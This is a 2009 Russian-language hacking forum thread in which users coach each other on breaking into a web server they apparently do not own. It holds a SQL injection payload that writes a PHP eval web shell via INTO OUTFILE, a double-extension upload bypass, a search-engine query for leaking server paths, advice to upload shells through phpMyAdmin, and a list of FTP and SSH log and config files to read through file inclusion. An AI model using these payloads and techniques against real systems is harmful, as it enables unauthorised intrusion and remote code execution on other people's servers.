HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 09.04.2009, 22:20
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

http://vsftpd.beasts.org/

Цитата:
vsftpd:
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers
ssh:

/var/log/auth.log

Последний раз редактировалось Pashkela; 09.04.2009 в 22:24..
 
Ответить с цитированием

  #2  
Старый 09.04.2009, 22:25
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

fker
1 Если маджик квот офф, зачем тебе конфиги? ищи папку на запись и лей шелл. Даже если ON залить можно при двойном запросе.

2 Ищи Phpmyadmin и лей через него, если база под рутом, то пасс думаю вытащишь от неё
Цитата:
shadow тоже не читается, что странно ведь бд запущена от рута
Это не тот рут, ничего странного
 
Ответить с цитированием

  #3  
Старый 09.04.2009, 22:34
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию

Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
именно пароли есть..
а подключение эт хорошая мысль, сейчас попробую, хотя для удаленных пользователей может быть закрыто..

Последний раз редактировалось fker; 09.04.2009 в 22:39..
 
Ответить с цитированием

  #4  
Старый 09.04.2009, 22:40
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от fker  
Дириктории на запись то есть, а вот полных путей нет, magic quots - off...
гугл
warning or error site:ТВОЙ_САЙТ

если сайтов несколько, то все прочекай, частенько помогает.
 
Ответить с цитированием

  #5  
Старый 09.04.2009, 22:50
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию

Цитата:
гугл
warning or error site:ТВОЙ_САЙТ
Найс, спасибо, отличная кверь пару инклудов еще нашел))
 
Ответить с цитированием

  #6  
Старый 10.04.2009, 13:54
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Как можно попробовать залить ПХП шелл если проходят файлы только с расширение gif и jpg?


И возможно ли через SQL-inj залить фаил?

Последний раз редактировалось Byrger; 10.04.2009 в 14:08..
 
Ответить с цитированием

  #7  
Старый 10.04.2009, 14:43
fker
Участник форума
Регистрация: 26.11.2008
Сообщений: 158
С нами: 9187097

Репутация: 158
По умолчанию

Попробуй расширение shell.jpg.php или в кртинку вставить код

Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна запись..
https://forum.antichat.ru/thread43966.html
2.2.1 Запись в файл

Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.

Пример: http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --


Для нее работает несколько ограничений.
Запрещенно перезаписывание файлов
Требуются привилегии типа FILE
(!)Обязательны настоящие кывычки в указании имени файла

А вот что бы нам мешало сделать веб шел? Вот например так:

http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
 
Ответить с цитированием

  #8  
Старый 10.04.2009, 14:52
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Цитата:
Сообщение от fker  
Попробуй расширение shell.jpg.php или в кртинку вставить код

Записать можно если есть права на запись, проблема в том что нужно знать поный путь куда доступна
.......
можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается
 
Ответить с цитированием

  #9  
Старый 10.04.2009, 15:30
DrAssault
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
С нами: 9204308

Репутация: 256
По умолчанию

Цитата:
Сообщение от Byrger  
<> () заменяюся на спец символы...
Полный путь я знаю...
А PHP шелл не заливался так-как туда вообще ничего не заливается
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
 
Ответить с цитированием

  #10  
Старый 10.04.2009, 15:38
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от DrAssault  
Ну режутся, это впринципе не трабла, подставь в хексе... и вообще скулю в студию, посмотреть бы на неё, на пальцах гадать как то не очень...
Да ты что?Как ты хексе то подставишь?...как подставишь в кесе так он и запишит в хексе..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.